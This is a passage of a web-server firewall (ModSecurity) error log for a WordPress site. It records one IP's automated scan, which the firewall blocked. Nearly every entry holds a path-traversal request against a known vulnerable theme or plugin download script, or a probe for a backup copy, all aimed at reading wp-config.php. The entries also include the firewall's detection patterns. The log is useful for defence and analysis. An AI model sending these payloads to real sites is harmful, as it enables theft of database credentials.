/wp-content/themes/liberator/inc/php/download.php?download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "Y8DxKMx9A9c0KkSpLadQKQAAAJI"] [Fri Jan 13 00:50:33.013357 2023] [:error] [pid 31042:tid 140315289704192] [client 185.206.224.212:43212] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/FR0_theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/FR0_theme/down.php"] [unique_id "Y8DxKY6vAq65Ygpdg5ObTQAAAEU"] [Fri Jan 13 00:50:33.128053 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:43214] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "Y8DxKaGMrWzzUVMdEhcMJgAAANI"] [Fri Jan 13 00:50:33.242738 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:43216] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/clinell/include/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/clinell/include/download.php"] [unique_id "Y8DxKaGMrWzzUVMdEhcMJwAAANQ"] [Fri Jan 13 00:50:33.357850 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:43218] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "Y8DxKaGMrWzzUVMdEhcMKAAAAMA"] [Fri Jan 13 00:50:33.479442 2023] [:error] [pid 31043:tid 140315272918784] [client 185.206.224.212:43220] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "Y8DxKcx9A9c0KkSpLadQKgAAAIc"] [Fri Jan 13 00:50:33.596562 2023] [:error] [pid 31043:tid 140315222562560] [client 185.206.224.212:43222] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y8DxKcx9A9c0KkSpLadQKwAAAI0"] [Fri Jan 13 00:50:48.658165 2023] [:error] [pid 31476:tid 140315247740672] [client 185.206.224.212:43270] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y8DxOKGMrWzzUVMdEhcMMgAAAMo"] [Fri Jan 13 00:50:48.775440 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:43272] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y8DxOKGMrWzzUVMdEhcMMwAAAM8"] [Fri Jan 13 00:50:51.975752 2023] [:error] [pid 31476:tid 140315188991744] [client 185.206.224.212:43284] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y8DxO6GMrWzzUVMdEhcMNwAAANE"] [Fri Jan 13 00:51:17.783962 2023] [:error] [pid 31042:tid 140315388712704] [client 185.206.224.212:43378] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.bak"] [unique_id "Y8DxVY6vAq65Ygpdg5ObVwAAAEI"] [Fri Jan 13 00:51:25.368728 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:43404] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.old"] [unique_id "Y8DxXaGMrWzzUVMdEhcMVQAAAM0"] [Fri Jan 13 00:51:47.494069 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:43488] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.bak"] [unique_id "Y8Dxc6GMrWzzUVMdEhcMZwAAAM8"] [Fri Jan 13 00:51:54.398770 2023] [:error] [pid 31043:tid 140315272918784] [client 185.206.224.212:43516] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.old"] [unique_id "Y8Dxesx9A9c0KkSpLadQUAAAAIc"] [Fri Jan 13 00:52:45.848394 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:43706] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "Y8DxraGMrWzzUVMdEhcMlgAAAMk"] [Fri Jan 13 00:52:56.185479 2023] [:error] [pid 31042:tid 140315138635520] [client 185.206.224.212:43750] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y8DxuI6vAq65Ygpdg5ObdAAAAFc"] [Fri Jan 13 00:52:56.299599 2023] [:error] [pid 31042:tid 140315147028224] [client 185.206.224.212:43752] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y8DxuI6vAq65Ygpdg5ObdQAAAFY"] [Fri Jan 13 00:53:55.953976 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:43964] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "Y8Dx86GMrWzzUVMdEhcM1QAAAME"] [Fri Jan 13 00:53:56.079968 2023] [:error] [pid 31043:tid 140315264526080] [client 185.206.224.212:43966] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y8Dx9Mx9A9c0KkSpLadQiwAAAIg"] [Fri Jan 13 00:53:56.971280 2023] [:error] [pid 31043:tid 140315256133376] [client 185.206.224.212:43972] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "Y8Dx9Mx9A9c0KkSpLadQjQAAAIk"] [Fri Jan 13 00:54:00.699417 2023] [:error] [pid 31041:tid 140315172206336] [client 185.206.224.212:43986] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/force-download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/force-download.php"] [unique_id "Y8Dx-MPRCDYHCWWhHpAj8wAAABM"] [Fri Jan 13 00:54:01.521680 2023] [:error] [pid 31043:tid 140315306489600] [client 185.206.224.212:43990] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "Y8Dx-cx9A9c0KkSpLadQkQAAAIM"] [Fri Jan 13 00:54:04.434267 2023] [:error] [pid 31043:tid 140315405498112] [client 185.206.224.212:44002] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y8Dx_Mx9A9c0KkSpLadQkgAAAIA"] [Fri Jan 13 00:54:05.358565 2023] [:error] [pid 31043:tid 140315155420928] [client 185.206.224.212:44006] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match 